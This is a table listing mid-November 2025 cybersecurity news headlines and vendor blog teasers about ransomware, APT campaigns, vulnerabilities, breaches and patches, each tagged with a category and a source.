| 22.11.25 | Rising Cybercrime During Black Friday & Cyber Monday : A 2025 Threat Intelligence Report | EXECUTIVE SUMMARY As the festive shopping season approaches, Black Friday and Cyber Monday bring a significant surge in online sales and, with it, a sharp increase in | Cyber blog | Cyfirma |
| 22.11.25 | OWASP Update Elevates Software Supply Chain and Misconfiguration Risk | The reputable and widely used Open Web Application Security Project (OWASP) Top 10 list just got its 8th update, and first update since 2021. One major and welcome change is that supply chain security has gone from not being a category at all to being the number three spot on the list. OWASP is shaking things up in other ways too, with one other new risk category and one consolidation. | Cyber blog | Eclypsium |
| 22.11.25 | Breaking Down S3 Ransomware: Variants, Attack Paths and Trend Vision One™ Defenses | In this blog entry, Trend™ Research explores how ransomware actors are shifting their focus to cloud-based assets, including the tactics used to compromise business-critical data in AWS environments. | Ransom blog | Trend Micro |
| 22.11.25 | Trend & AWS Partner on Cloud IPS: One-Click Protection | In the race to secure cloud infrastructure, intrusion prevention systems (IPS) remain one of the most critical yet complex at the cloud network layer of defense. For many organizations, deploying IPS in the cloud is a balancing act between agility and control. | Cyber blog | Trend Micro |
| 22.11.25 | Anatomy of an Akira Ransomware Attack: When a Fake CAPTCHA Led to 42 Days of Compromise | Unit 42 recently assisted a global data storage and infrastructure company that experienced a destructive ransomware attack. This attack was orchestrated by Howling Scorpius, the distributors of Akira ransomware. What began with a single click on what appeared to be a routine website CAPTCHA evolved into a 42-day (yes, we see the irony, too!) compromise that exposed critical gaps. | Ransom blog | Palo Alto |
| 22.11.25 | It’s not personal, it’s just business | Martin muses on how agentic AI is bringing efficiency improvements to the business of cyber crime. | Cyber blog | CISCO TALOS |
| 22.11.25 | Bill Largent: On epic reads, lifelong learning, and empathy | Join Bill Largent as he shares his passion for learning, the connection between reading and empathy, and offers fresh insights for the next generation of security professionals. | Cyber blog | CISCO TALOS |
| 22.11.25 | The OSINT playbook: Find your weak spots before attackers do | Here’s how open-source intelligence helps trace your digital footprint and uncover your weak points, plus a few essential tools to connect the dots | Cyber blog | Eset |
| 22.11.25 | PlushDaemon compromises network devices for adversary-in-the-middle attacks | ESET researchers have discovered a network implant used by the China-aligned PlushDaemon APT group to perform adversary-in-the-middle attacks | APT blog | Eset |
| 22.11.25 | What if your romantic AI chatbot can’t keep a secret? | Does your chatbot know too much? Here's why you should think twice before you tell your AI companion everything. | AI blog | Eset |
| 22.11.25 | License to Encrypt: “The Gentlemen” Make Their Move | Cybereason Threat Intelligence Team recently conducted an analysis of "The Gentlemen" ransomware group, which emerged around July 2025 as a ransomware threat actor group with relatively advanced methodologies. | Ransom blog | Cybereason |
| 22.11.25 | Defeating KASLR by Doing Nothing at All | I've recently been researching Pixel kernel exploitation and as part of this research I found myself with an excellent arbitrary write primitive…but without a KASLR leak. As necessity is the mother of all invention, on a hunch, I started researching the Linux kernel linear mapping. | Vulnerebility blog | Project Zero |
| 22.11.25 | Today’s threat landscape demands a proactive OT security strategy | OT is increasingly targeted by cybercriminals, making it essential for organizations to prioritize proactive OT security defense. | Security blog | Trelix |
| 21.11.25 | Grafana Patches CVSS 10.0 SCIM Flaw Enabling Impersonation and Privilege Escalation | Grafana has released security updates to address a maximum severity security flaw that could allow privilege escalation or user impersonation under certain configurations. The | Vulnerebility | The Hacker News |
| 21.11.25 | Google Brings AirDrop Compatibility to Android's Quick Share Using Rust-Hardened Security | In a surprise move, Google on Thursday announced that it has updated Quick Share, its peer-to-peer file transfer service, to work with Apple's equipment AirDrop, allowing users to more | OS | The Hacker News |
| 21.11.25 | APT24 Deploys BADAUDIO in Years-Long Espionage Hitting Taiwan and 1,000+ Domains | A China-nexus threat actor known as APT24 has been observed using a previously undocumented malware dubbed BADAUDIO to establish persistent remote access to | APT | The Hacker News |
| 21.11.25 | SEC Drops SolarWinds Case After Years of High-Stakes Cybersecurity Scrutiny | The U.S. Securities and Exchange Commission (SEC) has abandoned its lawsuit against SolarWinds and its chief information security officer, alleging that the company had misled | Cyber | The Hacker News |
| 21.11.25 | Salesforce Flags Unauthorized Data Access via Gainsight-Linked OAuth Activity | Salesforce has warned of detected "unusual activity" related to Gainsight-published applications connected to the platform. "Our investigation indicates this activity may have | CyberCrime | The Hacker News |
| 21.11.25 | ShadowRay 2.0 Exploits Unpatched Ray Flaw to Build Self-Spreading GPU Cryptomining Botnet | Oligo Security has warned of ongoing attacks exploiting a two-year-old security flaw in the Ray open-source artificial intelligence (AI) framework to turn infected clusters with NVIDIA | Exploit | The Hacker News |
| 21.11.25 | Tsundere Botnet Expands Using Game Lures and Ethereum-Based C2 on Windows | Cybersecurity researchers have warned of an actively expanding botnet dubbed Tsundere that's targeting Windows users. Active since mid-2025, the threat is designed to execute | BotNet | The Hacker News |
| 20.11.25 | Google fixes new Chrome zero-day flaw exploited in attacks | Google has released an emergency security update to fix the seventh Chrome zero-day vulnerability exploited in attacks this year. | Exploit | |
| 20.11.25 | Microsoft: Windows 10 KB5072653 OOB update fixes ESU install errors | Microsoft has released an emergency Windows 10 KB5072653 out-of-band update to resolve ongoing issues with installing the November extended security updates. | OS | |
| 20.11.25 | Malicious NPM packages abuse Adspect redirects to evade security | Seven packages published on the Node Package Manager (npm) registry use the Adspect cloud-based service to separate researchers from potential victims and lead them to malicious locations. | Virus | |
| 20.11.25 | RondoDox botnet malware now hacks servers using XWiki flaw | The RondoDox botnet malware is now exploiting a critical remote code execution (RCE) flaw in XWiki Platform tracked as CVE-2025-24893. | Virus | |
| 20.11.25 | Eurofiber France warns of breach after hacker tries to sell customer data | Eurofiber France disclosed a data breach it discovered late last week when hackers gained access to its ticket management system by exploiting a vulnerability and exfiltrated information. | Incindent | |
| 20.11.25 | Princeton University discloses data breach affecting donors, alumni | A Princeton University database was compromised in a cyberattack on November 10, exposing the personal information of alumni, donors, faculty members, and students. | Incindent | |
| 20.11.25 | Dutch police seizes 250 servers used by “bulletproof hosting” service | The police in the Netherlands have seized around 250 physical servers powering a bulletproof hosting service in the country used exclusively by cybercriminals for providing complete anonymity. | CyberCrime | |
| 20.11.25 | Microsoft: Azure hit by 15 Tbps DDoS attack using 500,000 IP addresses | Microsoft said today that the Aisuru botnet hit its Azure network with a 15.72 terabits per second (Tbps) DDoS attack, launched from over 500,000 IP addresses. | BotNet | |
| 20.11.25 | DoorDash email spoofing vulnerability sparks messy disclosure dispute | A vulnerability in DoorDash's systems could allow anyone to send "official" DoorDash-themed emails right from company's authorized servers, paving a near-perfect phishing channel. DoorDash has now patched the issue, but a contentious disclosure dispute has erupted, with both sides accusing each other of acting in bad faith. | Vulnerebility | |
| 20.11.25 | Pennsylvania AG confirms data breach after INC Ransom attack | The office of Pennsylvania's attorney general has confirmed that the ransomware gang behind an August 2025 cyberattack stole files containing personal and medical information. | Incindent | |
| 20.11.25 | Microsoft: Windows bug blocks Microsoft 365 desktop app installs | Microsoft is working to resolve a known issue preventing users from installing the Microsoft 365 desktop apps on Windows devices. | OS | |
| 20.11.25 | Google to flag Android apps with excessive battery use on the Play Store | Google will start taking action on Android apps in the official Google Play store that have high background activity and cause excessive battery draining. | OS | |
| 20.11.25 | New Amazon Threat Intelligence findings: Nation-state actors bridging cyber and kinetic warfare | The line between cyber warfare and traditional kinetic operations is rapidly blurring. Recent investigations by Amazon threat intelligence teams have uncovered a new trend that they’re calling cyber-enabled kinetic targeting in which nation-state threat actors systematically use cyber operations to enable and enhance physical operations. | APT blog | AWS |
| 20.11.25 | ThreatsDay Bulletin: 0-Days, LinkedIn Spies, Crypto Crimes, IoT Flaws and New Malware Waves | This week has been crazy in the world of hacking and online security. From Thailand to London to the US, we've seen arrests, spies at work, and big power moves online. Hackers | Cyber | The Hacker News |
| 20.11.25 | New Sturnus Android Trojan Quietly Captures Encrypted Chats and Hijacks Devices | Cybersecurity researchers have disclosed details of a new Android banking trojan called Sturnus that enables credential theft and full device takeover to conduct financial fraud. "A | Virus | The Hacker News |
| 20.11.25 | Iran-Linked Hackers Mapped Ship AIS Data Days Before Real-World Missile Strike Attempt | Threat actors with ties to Iran engaged in cyber warfare as part of efforts to facilitate and enhance physical, real-world attacks, a trend that Amazon has called cyber-enabled kinetic | APT | The Hacker News |
| 20.11.25 | TamperedChef Malware Spreads via Fake Software Installers in Ongoing Global Campaign | Threat actors are leveraging bogus installers masquerading as popular software to trick users into installing malware as part of a global malvertising campaign dubbed | Virus | The Hacker News |
| 20.11.25 | Hackers Actively Exploiting 7-Zip Symbolic Link–Based RCE Vulnerability (CVE-2025-11001) | A recently disclosed security flaw impacting 7-Zip has come under active exploitation in the wild, according to an advisory issued by the U.K. NHS England Digital on Tuesday. The | Exploit | The Hacker News |
| 19.11.25 | Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices | Cybersecurity researchers have disclosed details of a new campaign that leverages a combination of social engineering and WhatsApp hijacking to distribute a Delphi-based | Virus | The Hacker News |
| 19.11.25 | WrtHug Exploits Six ASUS WRT Flaws to Hijack Tens of Thousands of EoL Routers Worldwide | A newly discovered campaign has compromised tens of thousands of outdated or end-of-life (EoL) ASUS routers worldwide, predominantly in Taiwan, the U.S., and Russia, to rope them | Exploit | The Hacker News |
| 19.11.25 | EdgeStepper Implant Reroutes DNS Queries to Deploy Malware via Hijacked Software Updates | The threat actor known as PlushDaemon has been observed using a previously undocumented Go-based network backdoor codenamed EdgeStepper to facilitate adversary- | Virus | The Hacker News |
| 19.11.25 | ServiceNow AI Agents Can Be Tricked Into Acting Against Each Other via Second-Order Prompts | Malicious actors can exploit default configurations in ServiceNow's Now Assist generative artificial intelligence (AI) platform and leverage its agentic capabilities to conduct prompt | AI | The Hacker News |
| 19.11.25 | Fortinet Warns of New FortiWeb CVE-2025-58034 Vulnerability Exploited in the Wild | Fortinet has warned of a new security flaw in FortiWeb that it said has been exploited in the wild. The medium-severity vulnerability, tracked as CVE-2025-58034 , carries a CVSS score of | Vulnerebility | The Hacker News |
| 19.11.25 | Sneaky 2FA Phishing Kit Adds BitB Pop-ups Designed to Mimic the Browser Address Bar | The malware authors associated with a Phishing-as-a-Service (PhaaS) kit known as Sneaky 2FA have incorporated Browser-in-the-Browser (BitB) functionality into their arsenal, | Phishing | The Hacker News |
| 19.11.25 | Meta Expands WhatsApp Security Research with New Proxy Tool and $4M in Bounties This Year | Meta on Tuesday said it has made available a tool called WhatsApp Research Proxy to some of its long-time bug bounty researchers to help improve the program and more effectively | Social | The Hacker News |
| 18.11.25 | Frontline Intelligence: Analysis of UNC1549 TTPs, Custom Tools, and Malware Targeting the Aerospace and Defense Ecosystem | Last year, Mandiant published a blog post highlighting suspected Iran-nexus espionage activity targeting the aerospace, aviation, and defense industries in the Middle East. In this follow-up post, Mandiant discusses additional tactics, techniques, and procedures (TTPs) observed in incidents Mandiant has responded to. | APT blog | Google Threat Intelligence |
| 18.11.25 | Researchers Detail Tuoni C2's Role in an Attempted 2025 Real-Estate Cyber Intrusion | Cybersecurity researchers have disclosed details of a cyber attack targeting a major U.S.-based real-estate company that involved the use of a nascent command-and-control (C2) | ICS | The Hacker News |
| 18.11.25 | Iranian Hackers Use DEEPROOT and TWOSTROKE Malware in Aerospace and Defense Attacks | Suspected espionage-driven threat actors from Iran have been observed deploying backdoors like TWOSTROKE and DEEPROOT as part of continued attacks aimed at | Virus | The Hacker News |
| 18.11.25 | Seven npm Packages Use Adspect Cloaking to Trick Victims Into Crypto Scam Pages | Cybersecurity researchers have discovered a set of seven npm packages published by a single threat actor that leverages a cloaking service called Adspect to differentiate between | Spam | The Hacker News |
| 18.11.25 | Microsoft Mitigates Record 15.72 Tbps DDoS Attack Driven by AISURU Botnet | Microsoft on Monday disclosed that it automatically detected and neutralized a distributed denial-of-service (DDoS) attack targeting a single endpoint in Australia that measured 15.72 | Attack | The Hacker News |
| 18.11.25 | Google Issues Security Fix for Actively Exploited Chrome V8 Zero-Day Vulnerability | Google on Monday released security updates for its Chrome browser to address two security flaws, including one that has come under active exploitation in the wild. The vulnerability in | Exploit | The Hacker News |
| 18.11.25 | New EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT | Cybersecurity researchers have discovered malware campaigns using the now-prevalent ClickFix social engineering tactic to deploy Amatera Stealer and NetSupport RAT . The | Virus | The Hacker News |
| 17.11.25 | Dragon Breath Uses RONINGLOADER to Disable Security Tools and Deploy Gh0st RAT | The threat actor known as Dragon Breath has been observed making use of a multi-stage loader codenamed RONINGLOADER to deliver a modified variant of a remote access trojan | Virus | The Hacker News |
| 17.11.25 | Rust Adoption Drives Android Memory Safety Bugs Below 20% for First Time | Google has disclosed that the company's continued adoption of the Rust programming language in Android has resulted in the number of memory safety vulnerabilities falling below | Virus | The Hacker News |
| 16.11.25 | Microsoft: Windows 10 KB5068781 ESU update may fail with 0x800f0922 errors | Microsoft has confirmed it is investigating a bug causing the Windows 10 KB5068781 extended security update to fail to install with 0x800f0922 errors on devices with corporate licensing. | OS | |
| 16.11.25 | Decades-old ‘Finger’ protocol abused in ClickFix malware attacks | The decades-old "finger" command is making a comeback,, with threat actors using the protocol to retrieve remote commands to execute on Windows devices. | Virus | |
| 16.11.25 | Jaguar Land Rover cyberattack cost the company over $220 million | Jaguar Land Rover (JLR) published its financial results for July 1 to September 30, warning that the cost of a recent cyberattack totaled £196 million ($220 million) in the quarter. | Incindent | |
| 16.11.25 | Logitech confirms data breach after Clop extortion attack | Hardware accessory giant Logitech has confirmed it suffered a data breach in a cyberattack claimed by the Clop extortion gang, which conducted Oracle E-Business Suite data theft attacks in July. | Incindent | |
| 16.11.25 | Five plead guilty to helping North Koreans infiltrate US firms | The U.S. Department of Justice announced that five individuals pleaded guilty to aiding North Korea's illicit revenue generation schemes, including remote IT worker fraud and cryptocurrency theft. | APT | |
| 16.11.25 | Anthropic claims of Claude AI-automated cyberattacks met with doubt | Anthropic reports that a Chinese state-sponsored threat group, tracked as GTG-1002, carried out a cyber-espionage operation that was largely automated through the abuse of the company's Claude Code AI model. | AI | |
| 16.11.25 | Fortinet confirms silent patch for FortiWeb zero-day exploited in attacks | Fortinet has silently patched a critical zero-day vulnerability in its FortiWeb web application firewall, which is now being widely exploited. | Exploit | |
| 16.11.25 | Checkout.com snubs hackers after data breach, to donate ransom instead | UK financial technology company Checkout announced that the ShinyHunters threat group has breached one of its legacy cloud storage systems and is now extorting the company for a ransom. | Ransom | |
| 16.11.25 | US announces new strike force targeting Chinese crypto scammers | U.S. federal authorities have established a new task force to disrupt Chinese cryptocurrency scam networks that defraud Americans of nearly $10 billion annually. | Spam | |
| 16.11.25 | Google backpedals on new Android developer registration rules | Google is backpedaling on its decision to introduce new identity verification rules for all developers, stating that it will also introduce accounts for limited app distribution and will allow users to install apps from unverified devs. | Virus | |
| 16.11.25 | ASUS warns of critical auth bypass flaw in DSL series routers | ASUS has released new firmware to patch a critical authentication bypass security flaw impacting several DSL series router models. | Vulnerebility | |
| 16.11.25 | DoorDash hit by new data breach in October exposing user information | DoorDash has disclosed a data breach that hit the food delivery platform this October. Beginning yesterday evening, DoorDash, which serves millions of customers across the U.S., Canada, Australia, and New Zealand, started emailing those impacted by the newly discovered security incident. | Incindent | |
| 16.11.25 | Fortinet FortiWeb flaw with public PoC exploited to create admin users | A Fortinet FortiWeb path traversal vulnerability is being actively exploited to create new administrative users on exposed devices without requiring authentication | Exploit | |
| 16.11.25 | Kraken ransomware benchmarks systems for optimal encryption choice | The Kraken ransomware, which targets Windows, Linux/VMware ESXi systems, is testing machines to check how fast it can encrypt data without overloading them. | Ransom | |
| 16.11.25 | CISA warns of Akira ransomware Linux encryptor targeting Nutanix VMs | US government agencies are warning that the Akira ransomware operation has been spotted encrypting Nutanix AHV virtual machines in attacks. | Ransom | |
| 16.11.25 | New ‘IndonesianFoods’ spammer floods npm with 150,000 packages | An auto-spamming payload published on npm spams the registry by spawning new packages every seven seconds, creating large volumes of junk. | Spam | |
| 16.11.25 | RCE flaw in ImunifyAV puts millions of Linux-hosted sites at risk | The ImunifyAV malware scanner for Linux server, used by tens of millions of websites, is vulnerable to a remote code execution vulnerability that could be exploited to compromise the hosting environment. | Vulnerebility | |
| 16.11.25 | Washington Post data breach impacts nearly 10K employees, contractors | The Washington Post is notifying nearly 10,000 employees and contractors that some of their personal and financial data has been exposed in the Oracle data theft attack. | Incindent | |
| 16.11.25 | Microsoft rolls out screen capture prevention for Teams users | Microsoft is rolling out a new Teams feature for Premium customers that will automatically block screenshots and recordings during meetings. | OS | |
| 16.11.25 | Popular Android-based photo frames download malware on boot | Uhale Android-based digital picture frames come with multiple critical security vulnerabilities and some of them download and execute malware at boot time. | Virus | |
| 16.11.25 | CISA warns feds to fully patch actively exploited Cisco flaws | CISA warned federal agencies to fully patch two actively exploited vulnerabilities in Cisco Adaptive Security Appliances (ASA) and Firepower devices. | Exploit | |
| 16.11.25 | Police disrupts Rhadamanthys, VenomRAT, and Elysium malware operations | Law enforcement authorities from 9 countries have taken down 1,025 servers used by the Rhadamanthys infolstealer, VenomRAT, and Elysium botnet malware operations in the latest phase of Operation Endgame, an international action targeting cybercrime. | CyberCrime | |
| 16.11.25 | CISA warns of WatchGuard firewall flaw exploited in attacks | CISA has ordered federal agencies to patch an actively exploited vulnerability in WatchGuard Firebox firewalls, which allows attackers to gain remote code execution on compromised devices. | Vulnerebility | |
| 16.11.25 | Google sues to dismantle Chinese phishing platform behind US toll scams | Google has filed a lawsuit to dismantle the "Lighthouse" phishing-as-a-service platform used by cybercriminals worldwide to steal credit card information through SMS phishing attacks impersonating the U.S. Postal Service and E-ZPass toll systems. | Phishing | |
| 16.11.25 | Windows 11 now supports 3rd-party apps for native passkey management | Microsoft announced that passwordless authentication is now easier on Windows 11 through native support for third-party passkey managers, the first ones supported being 1Password and Bitwarden. | OS | |
| 16.11.25 | DanaBot malware is back to infecting Windows after 6-month break | The DanaBot malware has returned with a new version observed in attacks, six-months after law enforcement's Operation Endgame disrupted its activity in May. | Virus | |
| 16.11.25 | RondoDox Exploits Unpatched XWiki Servers to Pull More Devices Into Its Botnet | The botnet malware known as RondoDox has been observed targeting unpatched XWiki instances against a critical security flaw that could allow attackers to achieve arbitrary code | Virus | The Hacker News |
| 16.11.25 | Five Plead Guilty in U.S. for Helping North Korean IT Workers Infiltrate 136 Companies | The U.S. Department of Justice (DoJ) on Friday announced that five individuals have pleaded guilty to assisting North Korea's illicit revenue generation schemes by enabling information | APT | The Hacker News |
| 15.11.25 | Microsoft fixes bug causing false Windows 10 end-of-support alerts | Microsoft has resolved a bug causing incorrect Windows 10 end-of-support warnings on systems with active security coverage or still under active support after installing the October 2025 updates. | OS | |
| 15.11.25 | Extending Zero Trust to AI Agents: “Never Trust, Always Verify” Goes Autonomous | As AI agents gain autonomy to act, decide, and access data, traditional Zero Trust models fall short. Token Security explains how to extend "never trust, always verify" to agentic AI with scoped access, continuous monitoring, and human accountability. | AI | |
| 15.11.25 | New UK laws to strengthen critical infrastructure cyber defenses | The United Kingdom has introduced new legislation to boost cybersecurity defenses for hospitals, energy systems, water supplies, and transport networks against cyberattacks, linked to annual damages of nearly £15 billion ($19.6 billion). | Cyber | |
| 15.11.25 | Hackers exploited Citrix, Cisco ISE flaws in zero-day attacks | An advanced threat actor exploited the critical vulnerabilities "Citrix Bleed 2" (CVE-2025-5777) in NetScaler ADC and Gateway, and CVE-2025-20337 affecting Cisco Identity Service Engine (ISE) as zero-days to deploy custom malware. | Exploit | |
| 15.11.25 | Synnovis notifies of data breach after 2024 ransomware attack | Synnovis, a leading UK pathology services provider, is notifying healthcare providers that a data breach occurred following a ransomware attack in June 2024, which resulted in the theft of some patients' data. | Ransom | |
| 15.11.25 | Microsoft fixes Windows Task Manager bug affecting performance | Microsoft has resolved a known issue preventing users from quitting the Windows 11 Task Manager after installing the optional Windows 11 KB5067036 update. | OS | |
| 15.11.25 | Rhadamanthys infostealer disrupted as cybercriminals lose server access | The Rhadamanthys infostealer operation has been disrupted, with numerous "customers" of the malware-as-a-service reporting that they no longer have access to their servers. | Virus | |
| 15.11.25 | Synology fixes BeeStation zero-days demoed at Pwn2Own Ireland | Synology has addressed a critical-severity remote code execution (RCE) vulnerability in BeeStation products that was demonstrated at the recent Pwn2Own hacking competition. | Exploit | |
| 15.11.25 | Hackers abuse Triofox antivirus feature to deploy remote access tools | Hackers exploited a critical vulnerability and the built-in antivirus feature in Gladinet's Triofox file-sharing and remote-access platform to achieve remote code execution with SYSTEM privileges. | Exploit | |
| 15.11.25 | Microsoft: Windows 11 23H2 Home and Pro reach end of support | Microsoft has reminded customers today that systems running Home and Pro editions of Windows 11 23H2 have stopped receiving security updates. | OS | BleepingComputer |
| 15.11.25 | North Korean Hackers Turn JSON Services into Covert Malware Delivery Channels | The North Korean threat actors behind the Contagious Interview campaign have once again tweaked their tactics by using JSON storage services to stage malicious payloads. "The | Virus | The Hacker News |
| 15.11.25 | Researchers Find Serious AI Bugs Exposing Meta, Nvidia, and Microsoft Inference Frameworks | Cybersecurity researchers have uncovered critical remote code execution vulnerabilities impacting major artificial intelligence (AI) inference engines, including those from Meta, | AI | The Hacker News |
| 15.11.25 | Iranian Hackers Launch 'SpearSpecter' Spy Operation on Defense & Government Targets | The Iranian state-sponsored threat actor known as APT42 has been observed targeting individuals and organizations that are of interest to the Islamic Revolutionary Guard Corps | APT | The Hacker News |
| 15.11.25 | Advanced Threat Hunting: Four Techniques to Detect Phishing Infrastructure Before it Strikes | In cyber defense, reacting to a phishing attack means you’re already one step behind. A phishing email in an inbox is the end result of a long chain of attacker activity. The real win isn’t just analyzing the phish; it’s finding the infrastructure it came from before the attack is even launched using a proactive threat hunting model. | Phishing blog | Silent Push |
| 15.11.25 | The prevalence of obfuscation and multi-stage layering in today’s malware often forces analysts into tedious and manual debugging sessions. For instance, the primary challenge of analyzing pervasive commodity stealers like AgentTesla isn’t identifying the malware, but quickly cutting through the obfuscated delivery chain to get to the final payload. | Malware blog | Google Threat Intelligence | |
| 15.11.25 | Mandiant Threat Defense has uncovered exploitation of an unauthenticated access vulnerability within Gladinet’s Triofox file-sharing and remote access platform. This now-patched n-day vulnerability, assigned CVE-2025-12480, allowed an attacker to bypass authentication and access the application configuration pages, enabling the upload and execution of arbitrary payloads. | Vulnerebility blog | Google Threat Intelligence | |
| 15.11.25 | Every November, we make it our mission to equip organizations with the knowledge needed to stay ahead of threats we anticipate in the coming year. The Cybersecurity Forecast 2026 report, released today, provides comprehensive insights to help security leaders and teams prepare for those challenges. | Cyber blog | Google Threat Intelligence | |
| 15.11.25 | Global Overview In October 2025, the global volume of cyber attacks continued its upward trajectory. ... | Ransom blog | CHECKPOINT | |
| 15.11.25 | Cyber threats don’t always come with warning signs. Sometimes, they arrive as sponsored ads. Since .. | Hacking blog | CHECKPOINT | |
| 15.11.25 | Germany Urges Attack Surface Management Adoption as Routinely as Antivirus Protection | Germany’s Threat Landscape is growing at an unprecedented pace with attack surfaces expanding, APT actors dominating, and SMEs bearing the brunt of this offense. Here’s what you need to know. | APT blog | Cyble |
| 15.11.25 | October 2025 Attacks Soar 30% as New Groups Redefine the Cyber Battlefield | Near-record ransomware attacks and the rise of new threats like Sinobi highlight the need for rapid detection and response. | Cyber blog | Cyble |
| 15.11.25 | The Week in Vulnerabilities: From IT Systems to Airport Weather Monitoring | Vulnerabilities flagged by Cyble this week cover everything from IT and security products to critical airport weather systems. | Vulnerebility blog | Cyble |
| 15.11.25 | Multi-Brand themed Phishing Campaign Harvests Credentials via Telegram Bot API | CRIL analyzed an active phishing campaign leveraging HTML-based Telegram bot credential harvesters designed to mimic multiple prominent brands | Phishing blog | Cyble |
| 15.11.25 | Redis 8.2.2: Hardening the Lua Engine Against Four Critical Vulnerabilities | Introduction Redis is an open-source, in-memory data store widely used as a cache, message broker, and high-performance NoSQL database. It offers rich data structures like strings, hashes, lists, sets, sorted sets, bitmaps, HyperLogLogs, and streams, backed by atomic operations... | Vulnerebility blog | Seqrite |
| 15.11.25 | APT PROFILE – BRONZE BUTLER | BRONZE BUTLER, also known as Tick or REDBALDKNIGHT, is a sophisticated and persistent cyber espionage group believed to originate from China. The group primarily targets Japanese | APT blog | Cyfirma |
| 15.11.25 | Security brief: VenomRAT is defanged | VenomRAT is a commodity remote access trojan (RAT) used by multiple cybercriminal threat actors. Around since 2020 but first observed in Proofpoint data in 2022, VenomRAT was used most frequently by the hotel and hospitality targeting threat actor TA558. The malware is based on the open-source malware Quasar RAT. VenomRAT is essentially a clone of Quasar RAT with some extra components bolted on from other sources. | Malware blog | PROOFPOINT |
| 15.11.25 | Operation Endgame Quakes Rhadamanthys | Rhadamanthys is a prominent malware observed since 2022, used by multiple cybercriminal threat actors. | Malware blog | PROOFPOINT |
| 15.11.25 | Crossed wires: a case study of Iranian espionage and attribution | Between June and August 2025, Proofpoint began tracking a previously unidentified threat actor dubbed UNK_SmudgedSerpent targeting academics and foreign policy experts. | BigBrother blog | PROOFPOINT |
| 15.11.25 | Increase in Lumma Stealer Activity Coincides with Use of Adaptive Browser Fingerprinting Tactics | In this blog entry, Trend™ Research analyses the layered command-and-control approaches that Lumma Stealer uses to maintain its ongoing operations while enhancing collection of victim-environment data. | Malware blog | Trend Micro |
| 15.11.25 | Covert AutoIt Campaign Delivering Infostealers and RATs | Recently, the SonicWall Capture Labs threat research team has identified a new campaign delivering infostealer payloads using malicious AutoIt scripts along with the AutoIt interpreter. The campaign was observed delivering various payloads including Snake Stealer, XWorm, and Remcos RAT. | Malware blog | SonicWall |
| 15.11.25 | A Look At RondoDox ARM Malware | This week, the SonicWall Capture Labs Threat Research Team analyzed a sample of RondoDox, a Linux botnet infector. This malware is often paired with Mirai, and once installed on a victim system, it accepts C2 commands and can perform system reconnaissance while joining botnet DDoS activities. It has several methods of evading detection along with anti-debugging capabilities. | Malware blog | SonicWall |
| 15.11.25 | Microsoft Security Bulletin Coverage for November 2025 | Microsoft’s November 2025 Patch Tuesday has 63 vulnerabilities, of which 29 are Elevation of Privilege. The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of November 2025 and has produced coverage for 5 of the reported vulnerabilities | Vulnerebility blog | SonicWall |
| 15.11.25 | Nested Deserialization to RCE in Adobe Commerce & Magento (CVE-2025-54236) | The SonicWall Capture Labs threat research team became aware of an Improper Input Validation Vulnerability in Adobe Commerce and Magento Open-Source Platforms, assessed its impact and developed mitigation measures. Adobe Commerce and Magento Open-Source Platforms are e-commerce platforms that empower businesses to scale efficiently. Expanding on the trusted foundation of Magento, Adobe Commerce offers enterprise scale and performance, modern, API-first development, and seamless integration. | Vulnerebility blog | SonicWall |
| 15.11.25 | Command Injection in HuangDou UTCMS (CVE-2024-9916) Enables RCE | The SonicWall Capture Labs threat research team would like to highlight the vulnerability listed under CVE-2024-9916, as it remains unpatched and poses a potential risk to customer environments. Below is an analysis of the vulnerability itself, along with the mitigation measures against exploits that may target this vulnerability. | Vulnerebility blog | SonicWall |
| 15.11.25 | You Thought It Was Over? Authentication Coercion Keeps Evolving | Imagine a scenario where malicious actors don’t need to trick you into giving up your password. They have no need to perform sophisticated social engineering attacks or exploit vulnerabilities in your operating system. | Security blog | Palo Alto |
| 15.11.25 | The State of Ransomware – Q3 2025 | Record fragmentation and decentralization: The number of active extortion groups in Q3 2025 rose to a record of 85 groups, the highest number observed to date. The top 10 groups accounted only for 56% of all published victims, down from 71% in Q1. | Ransom blog | CHECKPOINT |
| 15.11.25 | Unleashing the Kraken ransomware group | In August 2025, Cisco Talos observed big-game hunting and double extortion attacks carried out by Kraken, a Russian-speaking group that has emerged from the remnants of the HelloKitty ransomware cartel. | Ransom blog | CISCO TALOS |
| 15.11.25 | Viasat and the terrible, horrible, no good, very bad day | In this week’s newsletter, Amy recounts her journey from Halloween festivities to unraveling the story of the 2022 Viasat satellite hack, with plenty of cybersecurity surprises along the way. | Hacking blog | CISCO TALOS |
| 15.11.25 | How password managers can be hacked – and how to stay safe | Hacking blog | Eset | |
| 15.11.25 | Why shadow AI could be your biggest security blind spot | From unintentional data leakage to buggy code, here’s why you should care about unsanctioned AI use in your company | AI blog | Eset |
| 15.11.25 | How Trellix Helix detects AS-REP Roasting in Active Directory | Adversaries use AS-REP Roasting to extract and crack password hashes from Active Directory (AD) accounts with Kerberos pre-authentication disabled, a misconfiguration that exposes credentials to offline brute force attacks. | Hacking blog | Trelix |
| 15.11.25 | Dark Web Roast - October 2025 Edition | Welcome to October 2025, where the cybercrime underground has officially become more absurd than a fever dream. | Cyber blog | Trelix |
| 14.11.25 | Microsoft releases KB5068781 — The first Windows 10 extended security update | Microsoft has released the KB5068781 update, the first Windows 10 extended security update since the operating system reached end of support last month | OS | |
| 14.11.25 | Microsoft November 2025 Patch Tuesday fixes 1 zero-day, 63 flaws | Today is Microsoft's November 2025 Patch Tuesday, which includes security updates for 63 flaws, including one actively exploited zero-day vulnerability. | OS | |
| 14.11.25 | Windows 11 KB5068861 & KB5068865 cumulative updates released | Microsoft has released Windows 11 KB5068861 and KB5068865 cumulative updates for versions 25H2/24H2 and 23H2 to fix security vulnerabilities, bugs, and add new features. | OS | |
| 14.11.25 | Microsoft: Emergency Windows 10 update fixes ESU enrollment bug | Microsoft has released an emergency out-of-band update to address a known issue preventing Windows 10 users from enrolling in the Extended Security Updates (ESU) program. | OS | |
| 14.11.25 | “Bitcoin Queen” gets 11 years in prison for $7.3 billion Bitcoin scam | A Chinese woman known as the "Bitcoin Queen" was sentenced in London to 11 years and eight months in jail for laundering Bitcoin from a £5.5 billion ($7.3 billion) cryptocurrency investment scheme. | Cryptocurrency | |
| 14.11.25 | SAP fixes hardcoded credentials flaw in SQL Anywhere Monitor | SAP has released its November security updates that address multiple security vulnerabilities, including a maximum severity flaw in the non-GUI variant of the SQL Anywhere Monitor and a critical code injection issue in the Solution Manager platform. | Vulnerebility | |
